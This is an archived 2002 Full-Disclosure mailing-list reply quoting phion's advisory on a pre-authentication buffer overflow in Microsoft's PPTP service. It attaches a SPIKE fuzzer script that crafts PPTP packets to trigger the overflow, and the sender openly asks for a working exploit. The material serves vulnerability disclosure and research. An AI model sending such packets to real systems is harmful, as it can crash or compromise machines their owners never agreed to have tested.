[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1033071201.30393.222.camel@www.immunitysec.com>
From: dave at immunitysec.com (Dave Aitel)
Subject: Re: Microsoft PPTP Server and Client remote vulnerability
SPIKE 2.6.2 or above should be able to handle this .spk file which will
replicate the vulnerability. Someone send me a working sploit in
exchange, please. I'm too lazy to muck with it. (Or I have other
exploits to muck with, one or the other :>)
-dave
P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy)
at http://www.immunitysec.com/spike.html, if you haven't already.
P.P.S. This script is released under the terms of the GNU GPL v 2.0.
On Thu, 2002-09-26 at 05:43, sh@...on.com wrote:
> phion Security Advisory 26/09/2002
>
> Microsoft PPTP Server and Client remote vulnerability
>
>
> Summary
> -----------------------------
>
> The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
> remotely exploitable pre-authentication bufferoverflow.
>
>
> Affected Systems
> -----------------------------
>
> Microsoft Windows 2000 and XP running either a PPTP Server or Client.
>
>
> Impact
> -----------------------------
>
> With a specially crafted PPTP packet it is possible to overwrite kernel
> memory.
>
> A DoS resulting in a lockup of the machine has been verified on
> Windows 2000 SP3 and Windows XP.
>
> A remote compromise should be possible deploying proper shellcode,
> as we were able to fill EDI and EDX with our data.
>
> Clients are vulnerable too, because the Service always listens on port
> 1723 on any interface of the machine, this might be of special concern
> to DSL users which use PPTP to connect to their modem.
>
>
> Solution
> -----------------------------
>
> As a temporary solution for the Client issue, one might firewall the PPTP
> port in the Internet Connection Firewall for Windows XP.
>
> We dont know of any solution for Windows 2000 and Windows XP PPTP servers.
>
> The vendor has been informed.
>
>
> Acknowledgements
> -----------------------------
>
> The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
> on behalf of phion Information Technologies.
>
>
> Contact Information
> -----------------------------
>
> phion Information Technologies can be reached via:
> office@...on.com / http://www.phion.com
>
> Stephan Hoffmann can be reached via:
> sh@...on.com
>
> Thomas Unterleitner can be reached via:
> t.unterleitner@...on.com
>
> References
> -----------------------------
>
> [1] phion Information Technologies
> http://www.phion.com/
>
> Exploit
> -----------------------------
>
> phion Information Technologies will not provide an exploit for this issue.
>
>
> Disclaimer
> -----------------------------
>
> This advisory does not claim to be complete or to be usable for any
> purpose.
>
> This advisory is free for open distribution in unmodified form.
>
> Articles or Publications that are based on information from this advisory
> have to include link [1].
>
>
-------------- next part --------------
//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);
//hostname
s_string_variable("A");
s_binary_repeat("00",63);
//vendor
s_string_variable("A");
s_binary_repeat("00",63);
s_block_end("PPTP");
///
/// NEXT PACKET
///
///
//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");
//call id
s_binary("0000");
//serial number
s_binary("0000");
//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//recieve window size
s_binary("0003");
//processing delay
s_binary("0000");
s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 232 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020926/41a8850f/attachment.bin
Powered by blists - more mailing lists